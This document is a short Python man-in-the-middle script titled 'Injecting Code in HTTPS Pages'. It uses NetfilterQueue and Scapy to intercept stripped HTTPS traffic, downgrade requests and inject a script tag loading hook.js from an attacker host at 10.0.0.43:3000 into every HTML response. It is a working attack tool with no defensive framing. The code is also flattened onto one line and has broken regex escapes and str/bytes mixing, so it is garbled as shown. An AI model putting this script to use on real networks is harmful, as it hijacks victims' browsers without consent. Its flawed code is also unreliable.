Injecting Code in HTTPS Pages:
#!/usr/bin/env python import re from netfilterqueue import NetfilterQueue from scapy.layers.inet import TCP, IP from scapy.packet import Raw def set_load(packet, load): packet[Raw].load = load del packet[IP].len del packet[IP].chksum del packet[TCP].chksum return packet def process_packet(packet): scapy_packet = IP(packet.get_payload()) if scapy_packet.haslayer(Raw) and scapy_packet.haslayer(TCP): load = scapy_packet[Raw].load if scapy_packet[TCP].dport == 10000: print("[+] Request") print(scapy_packet.show()) load = re.sub(b"Accept-Encoding:.*?\r\n", b"", load) load = load.replace("HTTP/1.1", "HTTP/1.0") elif scapy_packet[TCP].sport == 10000: print("[+] Response") injection_code = b'<script src="http://10.0.0.43:3000/hook.js"></script>' load = load.replace(b"</body>", injection_code + b"</body>") content_length_search = re.search(b"(?:Content-Length:s)(d*)", load) if content_length_search and b"text/html" in load: print(content_length_search) content_length = content_length_search.group(1) new_content_length = int(content_length) + len(injection_code) load = load.replace(content_length, str(new_content_length).encode()) if load != scapy_packet[Raw].load: print("Payload") new_packet = set_load(scapy_packet, load) print(str(new_packet)) packet.set_payload(str(new_packet).encode()) packet.accept() queue = NetfilterQueue() queue.bind(0, process_packet) try: queue.run() except KeyboardInterrupt: print('')